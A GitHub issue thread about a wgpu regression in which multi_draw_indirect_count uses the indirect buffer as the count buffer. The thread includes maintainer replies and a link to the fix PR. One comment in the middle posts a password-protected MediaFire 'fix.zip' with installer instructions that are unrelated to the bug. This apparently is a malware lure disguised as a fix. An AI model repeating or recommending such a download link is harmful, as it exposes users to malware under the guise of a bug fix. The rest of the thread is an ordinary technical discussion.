### ISSUE TITLE
multi_draw_indirect_count set incorrect count buffer id.

### ISSUE THREAD

**Issue by BlackStone1123** [gfx-rs/wgpu#6182]
**Description**
multi_draw_indexed_indirect_count & multi_draw_indirect_count api is regressed since upgrade to v22.0, the root cause is that the count buffer has been set wrong buffer id as code shown in snapshot.

**Repro steps**
Ideally, a runnable example we can check out.

**Expected vs observed behavior**
observed behavior: the count buffer has been set to be the same as indirect buffer, which will cause wrong command count in gpu side.
expected behavior: retrieve the count buffer with correct count buffer id.

**Extra materials**
![企业微信截图_1724915160935](https://github.com/user-attachments/assets/5807f81d-425b-4bdb-a9c5-18cbf9714cec)

**Platform**
platform: windows
graphics api: vulkan/dx12
wgpu version: 22.1.0

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by teoxoy** [comment]
https://github.com/gfx-rs/wgpu/pull/5884 seems to have regressed this, could you put up a PR that fixes this?

**Comment by BlackStone1123** [comment]
this is the fixes pr link: https://github.com/gfx-rs/wgpu/pull/6194
